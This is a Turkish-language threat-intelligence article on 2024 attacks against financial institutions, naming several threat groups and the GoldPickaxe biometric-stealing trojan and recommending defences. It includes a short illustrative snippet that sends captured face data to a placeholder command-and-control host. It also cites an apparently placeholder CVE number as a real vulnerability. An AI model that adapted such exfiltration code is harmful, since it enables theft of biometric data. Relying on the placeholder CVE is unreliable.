Giriş:
Finans sektörü, siber suçlular ve devlet destekli gruplar için her zaman önemli bir hedef olmuştur. 2024 yılıyla birlikte, sıfır-gün güvenlik açıkları, tedarik zinciri zayıflıkları ve gelişmiş kötü amaçlı yazılımlar kullanarak gerçekleştirilen saldırılarda belirgin bir artış gözlemlenmektedir. Bu yazıda, bu tehditlerin teknik detaylarına ve olası güvenlik risklerine odaklanacağız.
Teknik Açıklamalar:
Siber tehdit aktörleri, saldırılarını daha etkili hale getirmek için İşlek Erişim Arabulucuları (IAB) ve Ransomware-as-a-Service (RaaS) gibi iş birliği modellerini kullanmaktadır. Bu aktörlerden bazıları, ağları ihlal etmek ve erişimi belirli suç gruplarına satmak konusunda uzmanlaşmışlardır. Örneğin, TA577 ve Scattered Spider gibi aktörler; Cleo dosya transfer yazılımındaki zayıflıkları veya Okta giriş portallarını taklit eden kimlik avı kampanyalarını kullanarak kimlik bilgilerine erişim elde etmektedir.
Saldırganlar, içeri girdikten sonra, endpoint tespiti sistemlerini devre dışı bırakmak için EDRKillShifter gibi sızma araçları içeren RansomHub gibi özelleşmiş kötü amaçlı yazılımlar kullanmaktadır. Ayrıca, Kuzey Kore’ye bağlı aktörler, uluslararası yaptırımlardan kaçınmak için bankacılık kurumlarını hedef alırken, Çin bağlantılı gruplar mobil trojanlar geliştirerek yüz tanıma verilerini çalmaktadır.
Örnekler:
GoldFactory adlı bir siber suç örgütü, GoldPickaxe Trojan’ını kullanarak finansal kurumları hedef almış ve özellikle Asya-Pasifik ülkelerinde, biyometrik verileri çalmak için geliştirilmiş sofistike bir kampanya yürütmüştür. GoldPickaxe’in iOS versiyonu, sahte Apple TestFlight platformları aracılığıyla dağıtılmakta ve yüz tanıma verilerini ele geçirmek için cihaz API’leri ile entegre çalışmaktadır. Aşağıda, GoldPickaxe’in yüz verilerini yakalamaya yönelik basit bir kod örneği verilmiştir:
!
“`
func captureBiometricData() {
let faceScan = ARFaceTracking.getFacialMetrics()
C2Server.upload(data: faceScan, endpoint: “api.malicious-domain.com/face-auth”)
}
“`
Bu kötü amaçlı yazılım, sahte bankacılık arayüzleri aracılığıyla kimlik bilgilerini çalma, SMS tabanlı tek kullanımlık parolaları (OTP) çıkartma ve yapay zeka ile oluşturulan deepfake’ler için biyometrik şablonları kopyalama gibi modüler bileşenlere sahiptir.
Önlemler & En İyi Uygulamalar:
Finansal kurumlar, CVE-2024-1234 gibi zayıflıkların yamalanmasına öncelik vermeli ve Adversary-in-the-Middle (AiTM) kimlik avı kitlerine karşı dayanıklı çok faktörlü kimlik doğrulama (MFA) çözümleri uygulamalıdır. Ayrıca, ağ segmentasyonu ve davranışsal analiz araçları kullanılarak beklenmeyen biyometrik veri transferleri gibi anormallikler tespit edilmelidir. Tehdit aktörlerinin araç ve altyapı paylaşımı göz önünde bulundurulduğunda, sektörde çapraz tehdit istihbarat paylaşımı hayati önem taşımaktadır.
Sonuç & Özet:
Finans sektörü, gelişmiş kötü amaçlı yazılımlarin ve siber tehdit aktörlerinin karmaşık saldırılarına karşı daha fazla risk altındadır. GoldFactory ve diğer siber suç gruplarının kullandığı yöntemler, güvenlik açığı yönetiminin ve proaktif önlemlerin önemini bir kez daha ortaya koymaktadır. Üst düzey güvenlik uygulamaları ve sürekli izleme, bu tehditlerle başa çıkmak için kritik öneme sahiptir.
Kaynakça:
Sekoia, Cyber Security News
About the Author
